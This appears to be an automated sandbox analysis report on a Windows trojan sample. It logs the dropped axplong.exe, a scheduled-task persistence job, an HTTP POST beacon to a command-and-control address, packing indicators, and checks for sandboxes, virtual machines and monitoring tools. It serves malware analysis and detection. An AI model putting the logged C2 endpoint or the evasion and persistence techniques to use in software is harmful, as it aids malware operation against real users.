                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008ABD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,8_2_008ABD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/-dt
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php%
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-PP
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpA
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpHQ
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpKP
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpU
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpXP
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded4
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded?
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpiP
                    Source: axplong.exe, 00000008.00000002.2693224281.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedfA
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedhA1
                    Source: axplong.exe, 00000008.00000002.2693224281.0000000001319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpvQ

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008A4CF08_2_008A4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008AE4408_2_008AE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E30688_2_008E3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008D7D838_2_008D7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_009896808_2_00989680
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008A4AF08_2_008A4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E765B8_2_008E765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E2BD08_2_008E2BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E6F098_2_008E6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E87208_2_008E8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008E777B8_2_008E777B
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.997253916893733
                    Source: file.exeStatic PE information: Section: xtqiedmi ZLIB complexity 0.9943757178407351
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.997253916893733
                    Source: axplong.exe.0.drStatic PE information: Section: xtqiedmi ZLIB complexity 0.9943757178407351
                    Source: axplong.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1874944 > 1048576
                    Source: file.exeStatic PE information: Raw size of xtqiedmi is bigger than: 0x100000 < 0x198200

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 8.2.axplong.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xtqiedmi:EW;pzupkaig:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1cc7d5 should be: 0x1d0ac8
                    Source: file.exeStatic PE information: real checksum: 0x1cc7d5 should be: 0x1d0ac8
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: xtqiedmi
                    Source: file.exeStatic PE information: section name: pzupkaig
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: xtqiedmi
                    Source: axplong.exe.0.drStatic PE information: section name: pzupkaig
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_008BD84C push ecx; ret 8_2_008BD85F
                    Source: file.exeStatic PE information: section name: entropy: 7.98054945395771
                    Source: file.exeStatic PE information: section name: xtqiedmi entropy: 7.9531674604718186
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.98054945395771
                    Source: axplong.exe.0.drStatic PE information: section name: xtqiedmi entropy: 7.9531674604718186
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83865C second address: 838674 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43A4FCF698h 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F43A4FCF698h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A1CC second address: 84A1D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A1D4 second address: 84A1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A1D8 second address: 84A1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A1DC second address: 84A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A315 second address: 84A31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A31B second address: 84A321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A321 second address: 84A33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F43A4BB4C2Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A33A second address: 84A340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A340 second address: 84A345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4F2 second address: 84A501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43A4FCF69Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
